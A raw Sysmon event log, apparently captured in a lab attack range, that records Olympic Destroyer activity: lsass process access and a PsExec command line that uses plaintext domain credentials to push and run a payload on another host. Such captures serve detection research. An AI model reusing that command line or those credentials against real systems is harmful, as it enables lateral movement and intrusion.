23542300x8000000000000000292433Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:07.834{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=345422D0BB0F11BB2FE8FAF6E3E96F71,SHA256=AC5B6332F751D8DD98471AB283FBB80A0D1FC2A8210AB884D76C339EE9ECBEE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217764Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:07.435{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-140MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217763Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:04.691{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51415-false10.0.1.12-8000- 23542300x8000000000000000217762Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:07.120{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=886D09FFABBA8287EC1D7D56A391744A,SHA256=814C42419500FCD339C874884D157CE283617B81B673ADA3A24725B26937DA98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292471Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.917{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3CCF406FE4D951BFF5D8FDBF55C52F1,SHA256=251F06CDB0AA0FFBA79BE222A30A8C140B925A2F4D0B0763DDE6043488680E1B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292470Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.837{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292469Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.820{C8EA50B7-1304-6216-0E06-000000003802}6396C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292468Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.798{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1304-6216-0E06-000000003802}6396C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292467Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.798{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1304-6216-0E06-000000003802}6396C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292466Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:08.783{C8EA50B7-1304-6216-0E06-000000003802}6396C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 23542300x8000000000000000217766Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:08.448{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-141MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217765Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:08.181{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95CFF3C6B978F13BACCA16C018FF10E0,SHA256=FE25D63C9FEB92C1A7834CDFF2AF7A4473AF3FE5972EB46E6CA29BC4213E878D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292465Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.736{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=8E67AE899C8071EA32F2798BDE0D5CAC,SHA256=307E4F8CE213A891DB4E40FA3F81121A1DAD69A09EB2F001E52846796B765D83,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292464Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.720{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1304-6216-0F06-000000003802}6912C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292463Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.720{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1304-6216-0F06-000000003802}6912C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292462Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.698{C8EA50B7-1304-6216-0F06-000000003802}69123860C:\Windows\system32\conhost.exe{C8EA50B7-1304-6216-0E06-000000003802}6396C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292461Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.667{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1304-6216-0F06-000000003802}6912C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292460Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.636{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1304-6216-0F06-000000003802}6912C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292459Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.519{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292458Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.519{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292457Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.519{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292456Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.519{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292455Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.497{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1304-6216-0E06-000000003802}6396C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292454Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.481{C8EA50B7-12E6-6216-4B05-000000003802}67926928C:\Temp\olympic_destroyer.exe{C8EA50B7-1304-6216-0E06-000000003802}6396C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292453Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.494{C8EA50B7-1304-6216-0E06-000000003802}6396C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.12 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292452Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.481{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1304-6216-0E06-000000003802}6396C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292451Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.481{C8EA50B7-1304-6216-0C06-000000003802}7120C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292450Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.465{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1304-6216-0C06-000000003802}7120C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292449Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.465{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1304-6216-0C06-000000003802}7120C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292448Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:08.451{C8EA50B7-1304-6216-0C06-000000003802}7120C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292447Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.396{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1304-6216-0D06-000000003802}6420C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292446Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.396{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1304-6216-0D06-000000003802}6420C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292445Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.381{C8EA50B7-1304-6216-0D06-000000003802}64204592C:\Windows\system32\conhost.exe{C8EA50B7-1304-6216-0C06-000000003802}7120C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292444Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.349{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1304-6216-0D06-000000003802}6420C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292443Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.334{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1304-6216-0D06-000000003802}6420C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292442Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.218{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1304-6216-0C06-000000003802}7120C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292441Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:08.218{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292440Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 